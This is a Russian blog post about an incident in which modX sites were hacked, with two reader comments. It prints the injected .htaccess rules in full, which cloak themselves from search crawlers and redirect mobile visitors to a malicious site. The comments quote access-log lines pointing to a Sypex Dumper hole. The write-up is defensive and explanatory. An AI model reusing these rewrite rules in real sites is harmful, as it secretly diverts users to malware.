Взлом modX, слив мобильного трафика

Все началось с того, что позвонил клиент и пожаловался, что при заходе на его сайт с Андроида система начинает ругаться на наличие вирусов.

Проверяю — и правда. Причем не на одном клиентском сайте, а на нескольких. Причем давно. И все эти сайты написаны на движке modX.

У всех сайтов в корневом .htaccess красуется вот такой блок:

RewriteCond %{HTTP_USER_AGENT} (android|midp|j2me|symbian|series\ 60|symbos|windows\ mobile|windows\ ce|ppc|smartphone|blackberry|mtk) [NC]
RewriteCond %{HTTP_USER_AGENT} !(accoona|ia_archiver|antabot|ask\ jeeves|baidu|eltaindexer|feedfetcher|gamespy|gigabot|googlebot|gsa-crawler|grub-client|gulper|slurp|mihalism|msnbot|worldindexer|ooyyo|pagebull|scooter|w3c_validator|jigsaw|webalta|
yahoofeedseeker|mmcrawler|yandexbot|yandeximages|yandexvideo|yandexmedia|yandexblogs|yandexaddurl|
yandexfavicons|yandexdirect|yandexmetrika|yandexcatalog|yandexnews|yandeximageresizer) [NC]

RewriteRule (.*) http://********.ru/?7 [L,R=302] # On

Т.е. определение клиента — если это что-то мобильное, то идет переадресация на некий зловредный сайт.

Клиентские сайты на разных хостингах, но картина везде одинаковая.

Ввиду давности изменения .htaccess отследить способ взлома нелегко.

Объединяет сайты то, что у всех права на .htaccess были установлены 755 и в большинстве случаев register_globals включен.

Вот такие пироги. Не нужно забывать об элементрных правилах безопасности или ими пренебрегать.

6 июля 2012 Опубликовано в Разработка сайтов

2 комментария к записи “Взлом modX, слив мобильного трафика”

  1. Валентин:

    Перво — вы не указали версию модекса!
    Второе, если Ево, то обновляли ли вы версию с связи безопасностью, которая вышла весной, вы знаете, что Ево почти не потдеоживаеться, но за обновлениями нужно следить.
    Если Рево — в чём я сомневаюсь…… даже случаев не припомню.

    Ваш топик — больше похож на ложь, так как при публикации таких топиков опираются на факты. у вас Всё просто — Поломали дом! — а в каком и.т.д… толком нету, может вы какой-либо снипет самописный использовали?….. ньюансов милион.

  2. admin:

    Прикольно, что в этом блоге хоть какой-то вразумительный ответ появился раньше, чем на официальном сайте MODX, в топике http://forums.modx.com/thread/77982/modx-htaccess. В принципе, и пост, и топик на форуме Модэкса создавались с одной целью — получить хоть какую-нибудь помощь.

    Спасибо, кстати, что обвинили во лжи. Это, несомненно, сразу располагает к Вам как к собеседнику, который оперирует фактами.

    MODX evo 1.05.

    Согласен, возможно заголовок поста не совсем корректен. Правильнее было бы говорить о взломе сайта на MODX, а не о взломе непосредственно MODX. В чем разница — сейчас поясню.

    Очень похоже на то (опять доказательств однозначных нет, можете и дальше меня обвинять во лжи), что «ноги торчат» из утилиты создания резервных копий БД Sypex Dumper Lite version 1.0.8b.

    Взломано несколько сайтов, у всех есть следующие обращения к дамперу с одного и того же IP:

    188.***.***.76 — — [12/Jul/2012:15:16:01 +0300] «POST /dumper/dumper.php HTTP/1.0» 200 3846 «-» «Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1» 165292

    188.***.***.76 — — [12/Jul/2012:15:16:03 +0300] «POST /dumper/dumper.php HTTP/1.0» 200 9428 «-» «Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1» 563124

    188.***.***.76 — — [12/Jul/2012:15:16:06 +0300] «POST /dumper/dumper.php HTTP/1.0» 200 40447 «-» «Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1» 498045

    188.***.***.76 — — [12/Jul/2012:15:16:09 +0300] «POST /dumper/dumper.php HTTP/1.0» 200 5039 «-» «Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1» 486158

    Как видим, во всех случаях код ответа сервера 200, везде методом POST переданы какие-то данные.

    Думаю, кто-то эксплуатирует дыру Дампера, позволяющую изменять файлы на сервере.

Прокомментировать